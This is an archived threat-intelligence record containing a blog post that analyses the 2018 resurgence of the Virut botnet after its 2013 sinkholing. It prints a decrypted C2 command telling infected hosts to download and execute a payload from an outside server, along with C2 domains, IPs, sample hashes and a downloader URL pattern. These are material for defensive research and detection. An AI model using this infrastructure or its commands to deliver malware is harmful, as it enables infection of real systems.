{
	"id": "fd745088-c72e-4a11-9793-ee52c7192f18",
	"created_at": "2026-04-06T00:07:55.430225Z",
	"updated_at": "2026-04-10T03:21:19.543Z",
	"deleted_at": null,
	"sha1_hash": "f84d9419992fc2a016a96eff27bf250e5239cd5d",
	"title": "Virut Resurrects -- Musings on long-term sinkholing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 103460,
	"plain_text": "Virut Resurrects -- Musings on long-term sinkholing\r\nBy Christian J. Dietrich\r\nPublished: 2018-12-01 · Archived: 2026-04-05 16:42:39 UTC\r\nVirut is a botnet malware family which has initially been observed 13 years ago, in 2006. Traditionally, it spreads\r\nas a file-infecting virus, and has monetized pay-per-install schemes and information theft. Although believed to be\r\ndead by many following a major sinkholing operation conducted by NASK/CERT Polska in 2013, events over the\r\nlast few months indicate an uptick in activity. Earlier in 2018, an unusual drive-by attack with a Chinese nexus\r\ninvolved dropping a Virut sample. Having dealt with takedowns before and tracking botnets, this piqued my\r\ninterest.\r\nRecent activity\r\nFurther research shows that although the sinkholing from 2013 for C2 domains ending in .pl , .at , and .ru\r\nis still in place, some variants manage to evade and actively distribute additional malware as of November 2018.\r\nInterestingly, the C2 protocol has not changed. A recent Virut binary has the SHA-256 hash\r\n054eeaa9f120f3613cf06ad010c58adf025c4f8c03dcc6da6acd567be27e87aa and was first submitted to VirusTotal\r\nin November 2018. On 32-bit Windows, it injects code into the winlogon.exe process. To connect to the C2\r\nserver, it uses the domain tbsgay[.]com which at the time of analysis resolved to the IP address\r\n148.251.79[.]206. The full set of hardcoded C2 domains in this sample is:\r\ntbsgay[.]com\r\nffiuli[.]com\r\nlexfal[.]com\r\nsexpsa[.]com\r\nvolmio[.]com\r\nOnce connected, the server instructs to download and execute a PE file from\r\nhttp://77.73.69[.]179:9/mk/p0.php?a=31 . A hexdump of the decrypted C2 command looks as follows:\r\n0000 3A 75 2E 20 50 52 49 56 4D 53 47 20 62 6E 69 78 :u. PRIVMSG bnix\r\n0010 79 71 6C 7A 20 3A 21 67 65 74 20 68 74 74 70 3A yqlz :!get http:\r\n0020 2F 2F 37 37 2E 37 33 2E 36 39 2E 31 37 39 3A 39 //77.73.69.179:9\r\n0030 2F 6D 6B 2F 70 30 2E 70 68 70 3F 61 3D 33 31 0D /mk/p0.php?a=31.\r\n0040 0A .\r\nThe downloaded file (SHA-256 fb0852761cfb7bfa34be168452891d5849574254f8623192798f1c03c2777688) is\r\ntiny, just 4 KB in size, packed with UPX and has a recent build timestamp of 2018-11-01 22:54:34 UTC. It acts as\r\na downloader to retrieve further payloads via HTTP, using the User-Agent AdInstall . The URLs follow the\r\npattern:\r\nhttps://chrisdietri.ch/post/virut-resurrects/\r\nPage 1 of 5\n\nhttp://77.73.69.179:9/mk/p%u.php?a=%u\r\nThe first %u is a counter where the values 1 and 2 were observed. Note that the initial download URL that Virut\r\ndistributed follows the same pattern except for the counter value being 0.\r\nThe second %u is a value from a reserved area named e_res2 in the DOS header (offset 0x3a), preceding the\r\ne_lfanew field. The value is read from memory using\r\n*((_WORD *)GetModuleHandleA(0) + 0x1d)\r\nand was observed to be 31 exclusively. Typically, e_res2 is set to all zeroes in regular PE files as it is not used.\r\nIn other words, a nonzero value is uncommon. The purpose of retrieving this value is unclear but it could be an\r\nattempt by the operator to ensure that further samples are only downloaded by previously distributed samples.\r\nHowever, even with the second parameter set to 0, the payload is served.\r\nThe downloads yield two payload files:\r\n6dadd08b523be5bc41162cd4ca35afabd4c847733ad8df88362de1ee3b383e96 p0.php?a=31\r\n |\r\n +- 781c12e2ab1c08d885c002eee8ef9c03e92c9c196fe5a576399080d10fbaa693 p2.php?a=31\r\n | +-- build timestamp 2018-11-02 13:47:52 UTC\r\n |\r\n +- 6dadd08b523be5bc41162cd4ca35afabd4c847733ad8df88362de1ee3b383e96 p1.php?a=31\r\n +-- build timestamp 2018-11-29 21:54:49 UTC\r\nThese files are associated with malicious activities described by Fortinet, based on a common user agent string\r\nMedunja Solodunnja 6.0.0 that is used in subsequent C2 communication with the host\r\nstatic.76.102.69.159.clients.your-server[.]de (resolving to 159.69.102[.]76).\r\nThe Fortinet researchers suspect a Ukrainian nexus of the payload files based on a cookie maker in Lviv, Ukraine,\r\nwith the same name as the user agent, and domain registration data. It is unclear if the payload is operated by the\r\nsame entity as the Virut activity, though. In 2013, Brian Krebs mentioned research by Team Furry which suggests\r\na possible Polish nexus of the Virut operators.\r\nLooking back\r\nBefore the sinkholing in 2013, Virut has often ranked in the malware family top-ten which by itself justified\r\nregular scrutiny. With the sinkholing in place, it may have disappeared from people’s radar. How and when did\r\nVirut come to life again?\r\nPivoting off of the indicators from above, Virut appears to have resumed its activity slowly over the last year.\r\nAlthough less in volume, active C2 servers occasionally appear since end of 2017. For example, the IP address\r\n77.73.69[.]179 was observed in a likely Virut execution from February 2018 and as part of a Virut C2 command\r\nhttp://77.73.69[.]179:9/mk/li.jpg in the end of 2017.\r\nhttps://chrisdietri.ch/post/virut-resurrects/\r\nPage 2 of 5\n\nSimilarly, the Virut C2 at 148.251.79.206 appears to have operated since late 2017, with notably increased activity\r\nin November 2018.\r\nAnother interesting case is the Virut C2 domain gik.alr4[.]ru. It issued commands in early 2013, while resolving to\r\n178.132.202[.]196. At the end of January 2013, it was sinkholed and resolved to 148.81.111.111, the IP address of\r\nthe CERT.PL sinkhole at the time. Fast forward to October 2018, and the domain points to a C2 server\r\n(212.109.221[.]97) issuing the command !get http://77.73.69[.]179:9/mk/p0.php?a=31 .\r\nA bit of Virut history\r\nProbably one of the first technical descriptions on Virut was published by Joe Stewart in 2009, motivated by a\r\nshift from a plaintext C2 protocol to encrypted C2. His report details an interesting trick on the encryption in Virut\r\nC2 communication: Since the 4-byte session key is pseudorandomly chosen by each bot, and never transmitted to\r\nthe C2 server, the server is left with a known plaintext cryptanalysis attack to reveal it. Given the underlying IRC-like protocol with the string NICK at the start of the first message, a known plaintext attack reveals the key. Once\r\nrecovered, the session key is used to decrypt the remainder of the request as well as to encrypt the responses\r\ntowards the bot.\r\nThe following timeline highlights notable developments.\r\nTo increase resilience and impede sinkholing, Virut contains a date-seeded domain generation algorithm (DGA)\r\nthat generates up to 10,000 domains per day of the form [a-z]{6}.com . Daniel Plohmann and others documented\r\nthat Virut’s DGA is particularly prone to domain collisions, due to the small length and the high number of\r\ngenerated domains. The recent sample still contains the DGA. However, it seems that they were not needed to\r\nestablish C2 comms as the hardcoded domains were resolvable.\r\nhttps://chrisdietri.ch/post/virut-resurrects/\r\nPage 3 of 5\n\nTo prevent from hijacking the C2 channel, an RSA signature verification step was introduced. A valid Virut C2\r\nserver must provide a signed SHA-256 hash of the C2 domain. The signed hash is verified by the bot before\r\naccepting commands. This step is vulnerable to a replay attack and was most likely intended to gracefully handle\r\naccidental collisions between a DGA-generated domain and a completely unrelated domain. Nicolas Falliere\r\ndocumented this in August 2011. The same 2048-bit RSA modulus is still used in the current sample:\r\n# RSA modulus\r\n57 06 4C EC 3B 33 66 6C B5 DD 54 B5 71 4E 78 86\r\n42 50 FE 33 14 6B 02 60 0F 27 AA 81 71 AD C2 8B\r\n0B 57 39 4D 30 D0 8A 98 4D 6F 64 82 5C C9 51 49\r\n83 C0 5E 43 3E 88 ED 6D 38 01 68 19 42 4C AA 61\r\n59 DF 28 99 DA 63 3B 6C 0A C5 90 06 39 93 3F 5E\r\nF6 75 67 37 DA F5 79 07 63 9F 7A D3 D5 AB 84 BE\r\n61 C0 5C 43 16 B6 7A 79 F2 72 76 D9 74 CF C3 2B\r\nDB 61 43 34 72 3E 4B 34 9B 2D 77 09 A0 0E 80 52\r\n20 F5 73 CF BC 0F EF 8C 09 EB 3B FA A3 8F 87 8A\r\nCF D2 4A 19 74 9D C5 FD 9E E3 DE 55 8E BE C1 B6\r\nE8 B6 E6 4B 29 90 73 FC 0D 77 59 2C D2 95 C2 16\r\nE2 CB 35 19 E5 6B DB ED 72 4D 92 45 F1 9A 99 1C\r\n3D 24 38 38 D7 D8 77 4F 74 1B 82 0A 00 CF F7 2A\r\nD8 CD E6 F3 05 FA 65 CE 08 8D 28 2F 39 C6 F3 E9\r\nF2 89 8F 4C C5 8C 11 AA 2A AA 69 19 3C 95 70 05\r\n4C F9 BD 36 CD 60 20 FD AC 92 6A 1B 3B 7C 4B BB\r\nConclusion\r\nRecovering after a multi-year slow-down seems to be an attractive option for botnet operators. Malware\r\nresearchers who tracked such a botnet in the past may have shifted focus or even moved on to other topics. In\r\naddition, an uptick in activity may go unnoticed with sinkholing in place, unless carefully inspected.\r\nNo question, sinkholing botnets is tough, and there are many parties doing a great job to achieve it. Sustaining a\r\nsinkholing effort is even harder, especially if not paralleled by law enforcement action. Although sinkholing incurs\r\nadditional cost on the adversary, a patient operator may withstand sinkholing. In the end, sinkholing a botnet of\r\ncertain impact is certainly useful and necessary. It seems in addition to identifying and countering new threats, the\r\nanti-malware community may also need to monitor contained threats on a long-term basis.\r\nIndicators\r\nThe following is a summary of the indicators mentioned above.\r\n054eeaa9f120f3613cf06ad010c58adf025c4f8c03dcc6da6acd567be27e87aa\r\nfb0852761cfb7bfa34be168452891d5849574254f8623192798f1c03c2777688\r\n781c12e2ab1c08d885c002eee8ef9c03e92c9c196fe5a576399080d10fbaa693\r\n6dadd08b523be5bc41162cd4ca35afabd4c847733ad8df88362de1ee3b383e96\r\ntbsgay.com\r\nhttps://chrisdietri.ch/post/virut-resurrects/\r\nPage 4 of 5\n\nffiuli.com\r\nlexfal.com\r\nsexpsa.com\r\nvolmio.com\r\n148.251.79.206\r\n77.73.69.179\r\nstatic.76.102.69.159.clients.your-server.de\r\n159.69.102.76\r\ngik.alr4.ru\r\n212.109.221.97\r\nA related sample execution can be found here.\r\nSource: https://chrisdietri.ch/post/virut-resurrects/\r\nhttps://chrisdietri.ch/post/virut-resurrects/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://chrisdietri.ch/post/virut-resurrects/"
	],
	"report_names": [
		"virut-resurrects"
	],
	"threat_actors": [],
	"ts_created_at": 1775434075,
	"ts_updated_at": 1775791279,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f84d9419992fc2a016a96eff27bf250e5239cd5d.pdf",
		"text": "https://archive.orkl.eu/f84d9419992fc2a016a96eff27bf250e5239cd5d.txt",
		"img": "https://archive.orkl.eu/f84d9419992fc2a016a96eff27bf250e5239cd5d.jpg"
	}
}